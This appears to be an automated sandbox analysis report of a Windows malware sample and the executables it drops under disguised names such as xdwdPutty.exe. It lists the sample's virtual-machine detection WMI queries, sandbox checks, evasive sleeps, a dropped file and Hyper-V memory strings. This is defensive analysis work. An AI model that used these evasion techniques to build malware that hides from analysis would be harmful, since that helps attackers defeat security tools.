Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.0000000003151000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002531000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Memory allocated: 1200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1B3E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Memory allocated: 1AF10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Memory allocated: 1B150000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 2750000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 1A7E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1190000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 1ADB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 24E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 2290000 memory reserve \| memory write watch
Source: C:\Users\user\xdwdPutty.exe	Memory allocated: 1A530000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Window / User API: threadDelayed 9915	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9894	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Window / User API: threadDelayed 9954
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9923

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe

Dropped PE file which has not been started: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9836	Thread sleep count: 9894 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 10196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe TID: 6888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 3672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 8564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 9048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 9224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 1688	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: ptKNiAaGus.exe, 00000000.00000002.3333580070.000000001B79A000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Hypervisor Logical Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C084000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service5
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D683000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D658000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition6457
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partitionun?8
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partitiona
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3334551857.000000001B836000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"0
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipesu
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V HypervisorrB
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor>
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor;
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Hypervisor Root Partition
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dll passwordFormat="Hashed"
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor~8
